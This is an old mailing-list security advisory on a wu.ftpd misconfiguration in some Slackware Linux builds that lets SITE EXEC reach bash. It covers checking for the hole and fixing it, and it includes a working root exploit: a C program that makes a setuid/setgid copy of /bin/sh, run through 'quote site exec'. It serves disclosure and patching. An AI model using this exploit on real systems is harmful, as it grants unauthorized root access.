Exploit for Linux wu.ftpd hole

[H.Karrenbeld () ct utwente nl (Henri Karrenbeld)]

Since Bugtraq is exceptionally quiet lately, I though I should make it
come alive again with this discussion of the bug that was reported in
the wu.ftpd that comes with some Slackware distributions of Linux.
The report was just before Bugtraq went down for a long time, but
I've found the bug still to be present on all the Linux machines that
I have access to. So maybe it needs to be brought a little more in
the open. Here we go:

ObBug: - Short description of the bug

It involves wu.ftpd being misconfigured at compile time and allowing
SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users
this is ~ftp/bin). Now if in this /bin resides a program that gives
access to executables outside /bin, but in the users reach (such as
/bin/bash that gives access to the user's homedir), this opens up
a root vulnerability. This should have been set to /bin/ftp-exec and
which be set by the _PATH_EXECPATH variable in src/pathnames.h before
compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the
net has this securely set as default value.

- How to check ?

$ ftp -n localhost
user: <userid>
password: <passwd>
ftp> quote site exec bash -c id

If vulnerable it gives here: uid=0, gid=0, euid=<yourid>, egid=<your-gids>

Of course, bash should not be available at all

- How to exploit (in case your sysadmin or you think the above is not
  a problem)

go to your homedir and make a program: duh.c (or whatever)

main() {
   seteuid(0);
   setegid(0);
   system("/bin/cp /bin/sh ./sh");
   system("/bin/chmod 6755 ./sh");
}

$ make duh
$ ftp -n localhost (and login)
user: <userid>
password: <passwd>
ftp> quote site exec bash -c duh
ftp> quit

$ ./sh

bash#

(voila, QED)

- How to fix?

Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive
doesn't compile on linux) and compile it; you might want to define the
_PATH_PIDNAMES and _PATH_XFERLOG to other values there...(/usr/adm/ftp.pids-%s
and /usr/adm/xferlog for example). If you cannot find that I can email the
source to you,...if you trust the source I took somewhere unmodified and
if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too.
I can remember that I got it that way.

$) Henri Karrenbeld
-----------------------------------------------------------------------------
Hardware, n.:
        The parts of a computer system that can be kicked.
-----------------------------------------------------------------------------